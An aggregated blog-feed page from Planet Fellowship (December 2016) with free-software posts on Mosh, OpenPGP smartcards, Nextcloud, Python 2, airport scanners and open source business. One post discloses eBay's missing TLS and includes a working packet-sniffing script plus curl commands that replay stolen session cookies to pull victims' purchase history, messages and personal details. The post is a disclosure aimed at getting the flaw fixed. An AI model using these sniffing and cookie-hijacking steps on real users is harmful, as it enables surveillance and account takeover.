Planet Fellowship (en)

Saturday, 17 December 2016

Trying out Mosh – the Mobile Shell

Hook’s Humble Homepage | 22:37, Saturday, 17 December 2016

While browsing around wikis while waiting for the new kernel to compile on my poor little old ARMv5 server, I stumbled upon Mosh.

On its home page we can find the following description:

Remote terminal application that allows roaming, supports intermittent connectivity, and provides intelligent local echo and line editing of user keystrokes.

Mosh is a replacement for SSH. It's more robust and responsive, especially over Wi-Fi, cellular, and long-distance links.

… but what it boils down to is that if you even just occasionally have to SSH over an unstable WLAN or mobile internet, you should instead use Mosh.

The syntax seems very similar to OpenSSH and in fact, it does run on top of it (at least for authentication, then it uses its own AES-encrypted SSP over UDP). But the way it works, makes sure that even if you lose connection for a while, it will resume just fine. It also gets rid of network lag when typing and is in general very responsive.

Mosh is great for logging into remote shells, but you will still need to use OpenSSH for scp and sftp, as Mosh is optimised for character (and not binary) transport. Which is perfectly fine.

This is one of those tools that when you first try it out you simply go “Dear $deity, finally! Why Whhhhyyyyy haven’t I used this before …so many needlessly lost hours with SSH timing out …oh, so many.”

hook out → coming soon: Armbian on Olimex Lime 2 to replace (most) of my current Gentoo on DreamPlug

Thursday, 15 December 2016

Starting to use the Fellowship Card

vanitasvitae's blog » englisch | 13:00, Thursday, 15 December 2016

I recently became a fellow of the FSFE and so I received a nice letter containing the FSFE fellowship OpenPGP smartcard.

After a quick visual examination I approved the card to be *damn cool*, even though the portrait format of the print of it still confuses me when I look at it. I especially like, how optimistically many digits the membership number field has (we can do it!!!). What I don’t like, is the non-https link on the bottom of the backside.

But how to use it now?

It took me some time to figure out, what that card exactly is. The FSFE overview page about the fellowship card misses the information, that this is a OpenPGP V2 card, which might be handy when choosing key sizes later on. I still don’t know, whether the card is version 2.0 or 2.1, but for my usecase it doesn’t really matter. So, what exactly is a smart-card and what CAN I actually do with it?

Well, OpenPGP is a system that allows to encrypt and sign emails, files and other information. That is and was nothing new to me, but what actually was new to me is the fact, that the encryption keys can be stored elsewhere than on the computer or phone. That intrigued me. So why not jump right into it and get some keys on there? – But where to plug it in?

My laptop has no smart-card slot, but there is that big ugly slit at one side, that never really came to value for me, simply because most peripherals that I wanted to connect to my computer, I connected via loved USB. It’s an ExpressCard slot. I knew that there are extension cards that can be fit in there, so they aren’t in the way (like eg. a USB dongle would be). There must be smart-card readers for ExpressCards, right? Right. And since I want to read mails when I’m on a train or bus, I’d find it convenient, when the card reader vanishes inside my laptop.

So I went online and searched for ExpressCard smart-card readers. I ended up buying a Lenovo Gemplus smart-card reader for about 25€. Then I waited. After half an hour I asked myself, if that particular device would work well with GNU/Linux (I use Debian testing on my ThinkPad), so I did some research and reassured me, that there are free drivers. Nice!

While I waited for my card to arrive, I received another letter with my admin pin for the card. Just for the record ;)

Some days later the smart-card reader arrived and I happily shoved it into the ExpressCard slot. I inserted the card and checked via

gpg –card-status

what’s on the card, but I got an error message (unfortunately I don’t remember what exactly it was) about that there was no card available. So I did some more research and it turns out I had to install the package

pcscd

to make it work. After the installation, my smart-card was detected, so I could follow the FSFEs tutorial on how to use the card. So I booted into a live Ubuntu that I had laying around, shut off the internet connection, realized that I needed to install pcscd here as well, reactivated the internet, installed pcscd and disconnected again. At that point in time I wondered, what exact kind of OpenPGP card I had. Somewhere else (forgot where) I read, that the fellowship card is a version 2.0 card, so I could go full 4096 bit RSA. I generated some new keys, which took forever! While I did so, I wrote some nonsense stories into a text editor to generate enough entropy. It still took about 15 minutes for each key to generate (and a lot of nonsense!). What confused me, was the process of removing secret keys and adding them back later (see the tutorial.)

But I did it and now I’m proud owner of a fully functional OpenPGP smart-card + reader. I had some smaller issues with an older GPG key, that I simply revoked (it was about time anyway) and now everything works as intended. I’m a little bit sad, because nearly none of my contacts uses GPG/PGP, so I had to write mails to myself in oder to test the card, but that feel when that little window opens, asking me to insert my card and/or enter my pin pays up for everything :)

My main usecase for the card became signing git commits though. Via

git commit -S -m “message”

git commits can be signed with the card (works with normal gpg keys without a card as well)! You just have to add your keys fingerprint to the .gitconfig. Man, that really adds to the experience. Now every time I sign a commit, I feel as if my work is extremely important or I’m a top secret agent or something. I can only recommend that to everyone!

Of course, I know that I might sound a little silly in the last paragraph, but nevertheless, I hope I could at least entertain somebody with my first experiences with the FSFE fellowship card. What I would add to the wish list for a next version of the card is a little field to note the last digits of the fingerprint of the key thats stored on the card. That could be handy for remembering the fingerprint when there is no card reader available. Also it would be quite nice, if the card was usable in combination with smart-phones, even though I don’t know, how exactly that could be accomplished (maybe a usb connector on the card?)

Anyways that’s the end of my first blog post. I hope you enjoyed it. Btw: My GPG key has the ID 0xa027db2f3e1e118a :)

Edit: This is a repost from october. In the mean time, I lost my admin pin, because I generated it with KeePassX and did not click on “accept” afterwards. That’s a real issue that should be addressed by the developers, but thats another story. I can still use the card, but I can’t change the key on it, so some day I’ll have to order a new card.

vanitasvitae

Tuesday, 13 December 2016

Rename This Project

Paul Boddie's Free Software-related blog » English | 17:35, Tuesday, 13 December 2016

It is interesting how the CPython core developers appear to prefer to spend their time on choosing names for someone else’s fork of Python 2, with some rather expansionist views on trademark applicability, than on actually winning over Python 2 users to their cause, which is to make Python 3 the only possible future of the Python language, of course. Never mind that the much broader Python language community still appears to have an overwhelming majority of Python 2 users. And not some kind of wafer-thin, “first past the post”, mandate-exaggerating, Brexit-level majority, but an actual “that doesn’t look so bad but, oh, the scale is logarithmic!” kind of majority.

On the one hand, there are core developers who claim to be very receptive to the idea of other people maintaining Python 2, because the CPython core developers have themselves decided that they cannot bear to look at that code after 2020 and will not issue patches, let alone make new releases, even for the issues that have been worthy of their attention in recent years. Telling people that they are completely officially unsupported applies yet more “stick” and even less “carrot” to those apparently lazy Python 2 users who are still letting the side down by not spending their own time and money on realising someone else’s vision. But apparently, that receptivity extends only so far into the real world.

One often reads and hears claims of “entitlement” when users complain about developers or the output of Free Software projects. Let it be said that I really appreciate what has been delivered over the decades by the Python project: the language has kept programming an interesting activity for me; I still to this day maintain and develop software written in Python; I have even worked to improve the CPython distribution at times, not always successfully. But it should always be remembered that even passive users help to validate projects, and active users contribute in numerous ways to keep projects viable. Indeed, users invest in the viability of such projects. Without such investment, many projects (like many companies) would remain unable to fulfil their potential.

Instead of inflicting burdensome change whose predictable effect is to cause a depreciation of the users’ existing investments and to demand that they make new investments just to mitigate risk and “keep up”, projects should consider their role in developing sustainable solutions that do not become obsolete just because they are not based on the “latest and greatest” of the technology realm’s toys. If someone comes along and picks up this responsibility when it is abdicated by others, then at the very least they should not be given a hard time about it. And at least this “Python 2.8″ barely pretends to be anything more than a continuation of things that came before, which is not something that can be said about Python 3 and the adoption/migration fiasco that accompanies it to this day.

Cloud Federation – Getting Social

English – Björn Schießle's Weblog | 10:45, Tuesday, 13 December 2016

Clouds getting Social

Clouds getting Social

With Nextcloud 11 we continue to work on one of our hot topics: Cloud Federation. This time we focus on the social aspects. We want to make it as easy as possible for people to share their contact information. This enabled users to find each other and to start sharing. Therefore we extended the user profile in the personal settings. As the screenshot at the top shows, users can now add a wide range of information to their personal settings and define the visibility for each of them by clicking on the small icon next to it.

Privacy first

Change visibility of personal settings

Change visibility of personal settings

We take your privacy serious. That’s why we provide fine grained options to define the visibility of each personal setting. By default all new settings will be private and all settings which already exists before will have the same visibility as on Nextcloud 10 and earlier. This means that the users full name and avatar will only be visible to users on the same Nextcloud server, e.g. through the share dialog. If enabled by the administrator, this values, together with the users email address, will be synced with trusted servers to allow users from trusted servers to share with each other seamlessly.

As shown at the screenshot at the right we provide three levels of visibility: “Private”, “Contacts” and “Public”. Private settings will be only visible to you, even users on the same server will not have access to it. The only exceptions are the avatar and the full name because this are central data used at Nextcloud for activities, internal shares, etc. Settings which are set to “Contacts” will be shared with users on the same server and trusted servers, defined by the administrator of the Nextcloud server. Public data will be synced to a global and public address book.

Introducing the global address book

The best real world equivalent to the global address book is a telephone directory. For a new phone number people can chose to publish their phone number together with their name and address to a public telephone directory to enable other people to find them. The global address book follows the same pattern. By default nothing gets published to the global address book. Only if the user sets at least one value in their personal settings to “Public”. In this case all the public data will be synced to the global address book together with the users Federated Cloud ID. Users can remove their data at any time again by simply setting their personal data back to “Contacts” or “Private”.

In order to use the global address book as a source to find new people, this lookup needs to be enabled explicitly in the “Federated Cloud Sharing” settings by the administrator. For privacy reasons this is disabled by default. If enabled the share dialog of Nextcloud will query the global address book every time a user wants to share a file or folder, and suggest people found in the global address book. In the future there might be a dedicated button to access the global address book, both for performance reasons and to make the feature more discoverable.

Future work

The global address book can return many results for a given name. How do we know that we share with the right person? Therefore we want to add the possibility to verify the users email address, website and Twitter handle in Nextcloud 12. As soon as this feature is implemented the global address book will only return users where at least one personal setting is verified and also visualize the verified data so that the user can use this information to pick the right person.

Further, I want to extend the meaning of “Contacts” in one of the next versions. The idea is that “Contacts” should not be limited to trusted servers but include the users personal contacts. For example the data set to “Contacts” could be shared with every person to which the user already established at least one federated share successfully, or to all contacts with a Federated Cloud ID in the users personal address book. This way we will move slowly in the direction of some kind of decentralized and federated social network based on the users address book. This will also enable users to easily push their new phone number or other personal data to all their friends and colleagues, things for which most people use centralized and proprietary services like so called “business networks” these days.

Another interesting possibility, made possible by the global address book is to move complete user accounts from one server to another. Given that the user published at least some basic information on the global address book, they could use it to announce their move to another server. Other Nextcloud servers could find this information and make sure that existing federated shares continue to work.

Saturday, 10 December 2016

The Internet of Dangerous Auction Sites

Iain R. Learmonth | 21:25, Saturday, 10 December 2016

It might be that the internet era of fun and games is over, because the internet is now dangerous. – Bruce Schneier

Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives’ Energy & Commerce Committee about computer security after the Dyn attack. I’m including this quote because I feel it sets the scene nicely for what follows here.

Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment, I considered that maybe my traffic was being intercepted deliberately, there’s no way that eBay as a global company would be deliberately risking users in this way. I was wrong. There is not and has never been TLS for large swathes of the eBay site. In fact, the only point at which I’ve found TLS is in their help pages and when it comes to entering card details (although it’ll give you back the last 4 digits of your card over a plaintext channel).

sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser `whoami` wireshark
# Log out and in again to assume the privileges you've granted yourself

What can you see?

They first thing I’d like to call eBay on is a statement in their webpage about Cookies, Web Beacons, and Similar Technologies:

We don’t store any of your personal information on any of our cookies or other similar technologies.

Well eBay, I don’t know about you, but for me my name is personal information. Ana, who investigated this with me, also confirmed that her name was present on her cookie when using her account. But to answer the question, you can see pretty much everything.

Using the Observer module of PATHspider, which is essentially a programmable flow meter, let’s take a look at what items users of the network are browsing:

sudo apt install pathspider

The following is a Python 3 script that you’ll need to run as root (for packet capturing) and will need to kill with ^C when you’re done because I didn’t give it an exit condition:

import logging
import queue
import threading
import email
import re
from io import StringIO

import plt

from pathspider.observer import Observer

from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete

def tcp_reasm_setup(rec, ip):
        rec['payload'] = b''
        return True

def tcp_reasm(rec, tcp, rev):
        if not rev and tcp.payload is not None:
                rec['payload'] += tcp.payload.data
        return True

lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile("(?:item=|itm(?:\/[^0-9][^\/]+)?\/)([0-9]+)")

o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()

while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))

Note: PATHspider’s Observer won’t emit a flow until it is completed, so you may have to close your browser in order for the TCP connection to be closed as eBay does use Connection: keep-alive.

If all is working correctly (if it was really working correctly, it wouldn’t be working because the connections would be encrypted, but you get what I mean…), you’ll see something like:

INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116

It is left as an exercise to the reader to map the IP addresses to users. You do however have the hint that the first name of the user is in the cookie.

This was a very simple example, you can also passively sniff the content of messages sent and recieved on eBay (though I’ll admit email has the same flaw in a large number of cases) and you can also see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend you similar items and then those recommendations would also be available to anyone viewing the traffic at your workplace.

Perhaps you want to see the purchase history but you’re too impatient to wait for the user to view the purchase history screen. Don’t worry, this is also possible.

Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay.

Yes, it’s 2016, nearly 2017, and cookie hijacking is still a thing.

You may remember Firesheep, a Firefox plugin, that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk of session hijacking vulnerabilities to users of web sites that only encrypt the login process and not the cookie(s) created during the login process. Six years later and eBay has not yet listened.

So what is cookie hijacking all about? Let’s get hands on. This time, instead of looking at the request line, look at the Cookie header. Just dump that out. Something like:

print(headers['Cookie'])

Now you have the user’s cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and…

sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html

I’m sure you can use your imagination for more. One of my favourites is…

# Get the personal information
curl --cookie "$COOKIE" http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK > personal.html

This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account.

The techniques I’ve shown here do not seem to care where the request comes from. We tested using my cookie from Ana’s laptop and also tried from a server hosted in the US (our routing origin is in Germany so this should have perhaps been a red flag). I could not find any interface through which I could query my login history, I’m not sure what it would have shown.

I’m not a security researcher, though I do work as an Internet Engineering researcher. I’m publishing this as these vulnerabilities have already been disclosed in the paper I linked above and I believe this is something that needs attention. Every time I pointed out to someone that eBay does not use TLS over the last week they were suprised, and often horrified.

You might think that better validation of the source of the cookie might help, for instance, rejecting requests that suddenly come from other countries. As long as the attacker is on the path they have the ability to create flows that impersonate the host at the network layer. The only option here is to encrypt the flow and to ensure a means of authenticating the server, which is exactly what TLS provides.

You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale.

Please Internet, TLS already.

Tuesday, 06 December 2016

Rejection of voluntary naked scanner at airport

Matthias Kirschner's Web log - fsfe | 23:17, Tuesday, 06 December 2016

On my travel to the OGP summit in Paris I experienced how it works when you reject the voluntary naked scanner/body scanner. There are signs before security that this scan is voluntary and that you should tell the security personnel if you do not want it. That is what I did, and here my memorandum of what happened at Berlin Schönefeld this morning.

Naked Scanner

I asked the first security officer which queue I have to use if I do not want to use the naked scanner (~7:25am). He said I have to use it. After I told him that on the signs it is written that it is voluntary, he explained me that it is not really a naked scanner, but that they just see a contours of the body. We agreed that I will talk with the other officers who operate the machines.

After unpacking my laptop and liquids, I told the other security officer that I prefer the "manual treatment" (that is how they call it on the signs). He referred me to the colleague operating the machine. I was asked why I do not want it, and I said because data protection. Then I got the "manual control" which means that someone is doing the normal body massage. Afterwards they directly tested my clothing for signs of explosives.

Then the second officer brought me to my luggage, and asked me to unpack everything to have another scan of my belongings. During that he asked me why I refused the "body scanner" and there was some back and forth. As always I stayed friendly all the time, as I know that for the officers my behaviour meant more work, and that they are following orders. He explaining me they just see the contours and nothing else. I told him, that I do not trust what data of my body shape is saved and where it is stored. During the talk I also told him that what they see on their screens, and what is saved on the disk can be different things, and that just because they cannot access files from before does not mean they are not stored.

In the talk he explained me that they have to ask for the reasons why I am not doing the (see above "voluntary") check, and evaluate if this is plausible or if I am covering-up something. Pregnancy or implants would be a plausible reason. When I asked about data protection he said that is not a plausible reason, and that in such cases they would also have to ask the police to check you again.

After my luggage was scanned the second time, and I had all my belongings in the bag again they said they will now have to do the testing for signs of explosives. I told them that I was already checked for that, but they said that now my luggage will be checked. Well, so be it, another check and I can assure you that I am now quite sure that neither I nor my belongings I were in contact with explosives recently.

In the end the officer urged me to please inform myself again about the scanner to prevent such long procedures in future. Actually it was not that long, the procedure was over at ~7:45am. I wished them a nice day, left and wrote this blog post. I have to say I am concerned how people have to justify something which is supposed to be voluntary.

Now preparing the meeting in Paris...


Update 2016-12-09 14:24: I received many interesting comments about this post, especially on the corresponding tweet and in the comments on the BoingBoing article. Thanks to all of you who shared their experience and ideas on the subject there or by e-mail.

Documenting DUCK

David Boddie - Updates (Full Articles) | 17:35, Tuesday, 06 December 2016

Having recently considered restarting work on my Dalvik compiler tools, I thought I should at least try and improve some of the documentation that accompanies the project, beginning with the example applications.

The examples are written in a Python-like language that I called Serpentine. Programs written in this language are syntactically valid Python source code, but they wouldn't run in a Python interpreter even if you had a set of replacement modules for all the Java and Android libraries. (As an aside, my brother wrote a partial set of compatiblity modules for the Java standard library as part of his javaclass project many years ago.) The incompatibility between the languages is intentional. I wanted to be able to write programs that would be represented using as few virtual machine instructions as possible and, since the virtual machine is designed for a statically-typed language with primitive types, I was comfortable with imposing restrictions on how the language uses types to make the compilation process as simple as possible.

It would be possible to implement more dynamic, Python-like types on top of the primitive types but this could lead to inefficiencies at run-time or, at the very least, a more complicated compiler. Since the overall goal was to have a language that resembled Python enough to make Android programming familiar to a Python programmer, implementing all the semantic features of Python is not really a priority, especially since programmers have to face up to the platform APIs at some point.

Inline Documentation

One of the other areas where I decided to experiment with non-Python-like behaviour is in the use of docstrings, the short text descriptions that follow the start of modules, classes and functions. These are handled specially by the standard Python parser so that they don't get mixed into the code that the CPython interpreter wants to run. However, when parsing code for other purposes, this can be a bit of a disadvantage. One thing I wanted to do was to interleave descriptive strings throughout a program and process them to create a document that combines text and source code. Having the docstrings stored separately from other nodes in an abstract syntax tree makes the task of doing this processing a bit more tedious since we need to work out where the original strings were in the source code.

The Mercurial repository for the project is currently residing on Bitbucket, which is less than ideal from a Free Software perspective. However, we can take advantage of the service's Markdown support to automatically render files marked up in this language. Since Markdown tends to be supported by other services and tools, we are not locked into this service and could easily migrate the repository elsewhere, processing the documentation differently if required. Since Markdown is not so different to reStructuredText, we could even just generate documentation using Sphinx with not too much effort.

The end result is that inline text from the examples is interleaved with the source code to produce text in Markdown format. When the contents of the repository are viewed in a browser, this text is processed and rendered as regular HTML by the hosting service, making it easier to read about the examples provided with the compiler.

Although I haven't used this approach for the compiler itself, I think that it might be interesting to try it. The style of documentation I am used to writing is focused on how programmers use library APIs, but documenting the internal structure of a project is a different kind of task. Perhaps I'll experiment with a combination of the two approaches to try and get the best of both worlds.

Categories: Free Software, Android, Documentation

Saturday, 03 December 2016

Conquer the World with Open Source

Blog – Think. Innovation. | 15:38, Saturday, 03 December 2016

Last week I had the privilege and pleasure to do a talk at the Open Source Software and Hardware Congres (OSSH Event) in Den Bosch, The Netherlands. Since I got some positive reactions on this talk, I decided to write this Blog Post about it, containing the main points.

The organization asked me to talk about “earning money with Open Source”, a topic I have been talking about at several other conferences. However, this time I decided not to just focus on explaining various Open Source Revenue Models, but instead focus more on the disruptive global successes an Open Source Strategy can bring about. Therefor the somewhat grandiose title of my talk: Conquer the World with Open Source.

In the talk I aimed at explaining how some very successful companies have been hugely successful by choosing the unconventional way, by having the guts to do it differently and adopting Open Source as a Strategy. What I mean by this is that Open Source forms a vital part of the Value Proposition of a company. This opposed to mere regarding and using Open Source Software (and increasingly Hardware) as an alternative to Proprietary products for running your business.

Remark: most of the rest of the talks at OSSH were about the pros and cons of using Open Source Software in a regular business, including a lot about security-related matters. Interesting exceptions were the talk by RedHat about Internet of Things and by Smart Robotics about ROS Open Source Robotics.

My talk included three case studies of “Big Conquerers”, from Open Source Software, three case studies of “Small Conquerers”, from the upcoming Open Source Hardware movement and some tips for those who are interested in becoming an Open Source Conquerer.

The Big Conquerers in Open Source Software

As the Innovation Model of Open Source was invented as a Software Development and Distribution practice and has been around for a long time, this is where the biggest successes can be found:

“Build a Multinational with Open Source” (RedHat)

RedHat has shown that building a multinational company is possible and its clients, employees and the entire community are benefiting from their success. This year (2016) RedHat will make over $2 billion revenue, being the first Open Source company to do so.

Starting in 1993, it now has 9300 employees and serves its customers in 35 countries. For this unfamiliar with the company: RedHat mainly provides support and services around Open Source Software like GNU/Linux, but also provides Cloud and IoT solutions, consultancy and training.

“Become Market Leader by adopting an Open Source Strategy” (Android)

About a decade ago (2007) Google released its first version of the Open Source Operating System for smartphones: Android. Seeing the vastly growing market for mobile phones and particularly smartphones, Google decided it could not afford to leave out and chose an Open Source strategy.

The result: as Apple’s iOS starting pushing away Palm, BlackBerry and Windows, the market leaders at the time, Android overtook iOS in just a couple of years. And at the moment almost 90% of all smartphones sold run on an Open Source OS, with GNU/Linux at the core.

However, some critical remarks can also be made about Google’s strategy for Android. Google is making more and more of the apps that used to be Open Source as a Proprietary component of the OS and the company has a serious lock-down on all companies producing phones with Android and Google’s flagship apps like GMail, Google Play and Google Maps with the Open Handset Alliance. Well, not so Open actually, for example: if a company produces phones with these flagship apps, they have to include ALL of them and are forbidden to produce phones that run a fork (another version) of Android.

“Make Global Impact by Open Sourcing your Product” (WordPress)

It was 2003 and the market of Content Management Systems (CMS) was still highly volatile and in tremendous development. In that time it was still normal to build your own (general purpose) CMS, or at least consider the possibility. WordPress changed that, by becoming the best CMS around and Open Sourcing it to make a global impact.

At the moment 25% of the top 10 million websites run WordPress and the ecosystem of premium themes, plug-ins, customizations and implementations is said to be a ‘Billion Dollar Ecosystem’, although it is very hard to calculate this number given the distributed non-centralized nature of Open Source.

The Software as a Service (SaaS) version of the CMS, which is wordpress.com, serves 76 million blogs. It is amazing how WordPress, or Automattic, the company behind this product, has been able to make all of this possible and has just around 400 employees.

By comparison: Twitter has 10 times as many employees and Facebook 40 times.

The Small Conquerers in Open Source Hardware

Given the success of Open Source in Software, we now see ‘a transition from bits to atoms’ where this innovation model is being experimented with, being tested and eventually being re-invented to be compatible and successful with Hardware. Some very promising Open Source Hardware companies exist nowadays and we can learn a lot and get inspiration from these cases:

“Define the de-facto Standard” (Arduino)

A little over 10 years ago (2005) a group of researchers and university students in Italy were looking for a way to allow their students to quickly include electronics in their art projects. At that time one needed to be a trained embedded systems engineer and a software engineer if you wanted to do some more advanced things with electronics.

For this reason the group developed a small basic micro-controller board which could be easily connected and extended with modules. Furthermore, they built a program to be able to easily develop software for it, called an Integrated Development Environment (IDE).

The Arduino project was born and the group soon saw a huge demand for the product coming from everywhere. They decided to start producing and selling the Arduino products in larger quantities, expanding globally. Also, because all of the designs, documentation and code were Open Source, many clones came onto the market, hoping to be in the slipstream of this success.

Today Arduino is the de-facto standard for any educational, art, hobby and even professional electronics prototyping project, especially given the huge IoT hype. The Arduino project is believed to have made around € 50 million revenue to date and the webshop Adafruit sells € 250.000 in Arduino products each month. And note: these are the official, original or certified Arduino products, not the clones, which are a multitude of that.

“Disrupt the Supply Chain” (OpenDesk)

OpenDesk is an interesting case as it is trying to build an open platform for furniture, mainly desks and tables, where the client directly connects with the designer and maker. The idea is that only information is transported globally and the physical products are made locally by manufacturers called ‘makers’ using computer controlled machinery, like CNC Routers.

A client requests a desk to be made and a request for proposal goes out to local makers. Then when the client decides to buy the product, the local maker is going to make it, where every party involved gets a piece of the financial pie. The designer, the platform, the channel, the maker are all paid a fair share.

OpenDesk calls itself the “IKEA of the 21st century”, but since the furniture price is a multiple of IKEA furniture, I think it is mainly an interesting experiment to figure out how to make this rather complicated Open Source platform model work.

A side note: the designers choose the license to share their work under and most of them choose to use a ‘non-commercial’ license, which means that most of OpenDesk’s designs are not Open Source.

“Overtake the Big Boys” (The Things Network)

A few years ago a conglomerate of multinational corporations decided to set a new standard for Machine to Machine (M2M) communications, to be able to service the upcoming Internet of Things industry. This conglomerate is called the LoRa Alliance and the communication protocol is released as an open standard.

Then in 2015 a small group of people in Amsterdam decided to take advantage of this openness and were able to set up a city-wide network in just six weeks, with a relatively small amount of investment. The initiative was a huge success and got tons of media attention: The Things Network (TTN) was born.

Now TTN defines itself as a distributed community-owned open source IoT network. The movement has expanded globally, forming local communities everywhere. At the moment the community spans 60 countries, with over 200 communities, having a total of 900 active gateways.

Their Kickstarter campaign, aiming to bring their own developed cheap hardware on the market, was a huge success, bringing in almost € 300,000, twice the intended amount.

Recently TTN announced a deal with Farnell, the global distributor of Raspberry Pi, to distribute their products as well. I think KPN and other corporations are jealously looking at what TTN has accomplished as a grass-roots open source movement and wish they had started this amazing concept.

Become an Open Source Conquerer

After reading about the successes of these six Open Source Conquerers, I hope you get inspiration to at least consider this unconventional approach to make your innovative idea a worldwide success! We can learn a lot by studying these companies and in case you are still wondering:

“But how do I make money with Open Source?” here is a list of the options you have:

Sell or rent out physical products
Sell products and services made with Open Source products
Sell per-client installations and customizations
Sell the means to use Open Source
Sell education and consultancy
Sell proprietary premium products
Sell the franchise and certification
Organize events and sell tickets
Benefit from ‘open’-oriented subsidies and (research) grants
Start a foundation or consortium

Basically you sell products and services just as any traditional ‘closed’ company, except that you cannot sell licensed to intellectual property like patents. This list is an adaptation from Lars Zimmerman’s excellent article about the topic.

“Be Fair, do not OpenWash!”

When you are going for Open Source, I recommend you to do it properly and in a fair way. Do not market and promote “Open Source”, when it in fact is not. Stick to the widely accepted Open Source Software Definition by the Open Source Initiative and the Open Source Hardware Definition by the Open Source Hardware Association.

If you play tricks I call this “Openwashing” and it can and probably will explode in your face later on. A famous example of this is Makerbot, which several years ago was the market leader for desktop 3D Printers. They had a huge community, which helped them out in many ways and they were developing really innovative printers, completely Open Source. Then somebody decided to take all the ‘source’ (design files, schematics, etc.) and start a Crowdfunding campaign to have clones made in China.

Even though the campaign failed this scared the Makerbot founders enough to make the unwise decision to make Makerbot proprietary. This caused outrage in the community and destroyed their brand. Combined with bringing several low quality 3D Printers on the market, the company is now marginalized and could very well seize to exist soon.

“Think Big, Act Small”

One final advice for when starting out with an Open Source Strategy: “Think Big, Act Small”. Since you probably have no or little experience on the topic and how to make a successful Open Source Business Model, start with small experiments and learn on the way.

Look for example at what Texas Instruments and Intel are doing in this regard: big corporations who tip their toes in the waters of Open Source.

If you are wondering about my experience with Open Source Business Models, then check out Totem Open Health, an initiative I started in 2014 and now continues to conquer the world without me.

Thursday, 01 December 2016

Using a fully free OS for devices in the home

DanielPocock.com - fsfe | 13:11, Thursday, 01 December 2016

There are more and more devices around the home (and in many small offices) running a GNU/Linux-based firmware. Consider routers, entry-level NAS appliances, smart phones and home entertainment boxes.

More and more people are coming to realize that there is a lack of security updates for these devices and a big risk that the proprietary parts of the code are either very badly engineered (if you don't plan to release your code, why code it properly?) or deliberately includes spyware that calls home to the vendor, ISP or other third parties. IoT botnet incidents, which are becoming more widely publicized, emphasize some of these risks.

On top of this is the frustration of trying to become familiar with numerous different web interfaces (for your own devices and those of any friends and family members you give assistance to) and the fact that many of these devices have very limited feature sets.

Many people hail OpenWRT as an example of a free alternative (for routers), but I recently discovered that OpenWRT's web interface won't let me enable both DHCP and DHCPv6 concurrently. The underlying OS and utilities fully support dual stack, but the UI designers haven't encountered that configuration before. Conclusion: move to a device running a full OS, probably Debian-based, but I would consider BSD-based solutions too.

For many people, the benefit of this strategy is simple: use the same skills across all the different devices, at home and in a professional capacity. Get rapid access to security updates. Install extra packages or enable extra features if really necessary. For example, I already use Shorewall and strongSwan on various Debian boxes and I find it more convenient to configure firewall zones using Shorewall syntax rather than OpenWRT's UI.

Which boxes to start with?

There are various considerations when going down this path:

  • Start with existing hardware, or buy new devices that are easier to re-flash? Sometimes there are other reasons to buy new hardware, for example, when upgrading a broadband connection to Gigabit or when an older NAS gets a noisy fan or struggles with SSD performance and in these cases, the decision about what to buy can be limited to those devices that are optimal for replacing the OS.
  • How will the device be supported? Can other non-technical users do troubleshooting? If mixing and matching components, how will faults be identified? If buying a purpose-built NAS box and the CPU board fails, will the vendor provide next day replacement, or could it be gone for a month? Is it better to use generic components that you can replace yourself?
  • Is a completely silent/fanless solution necessary?
  • Is it possibly to completely avoid embedded microcode and firmware?
  • How many other free software developers are using the same box, or will you be first?

Discussing these options

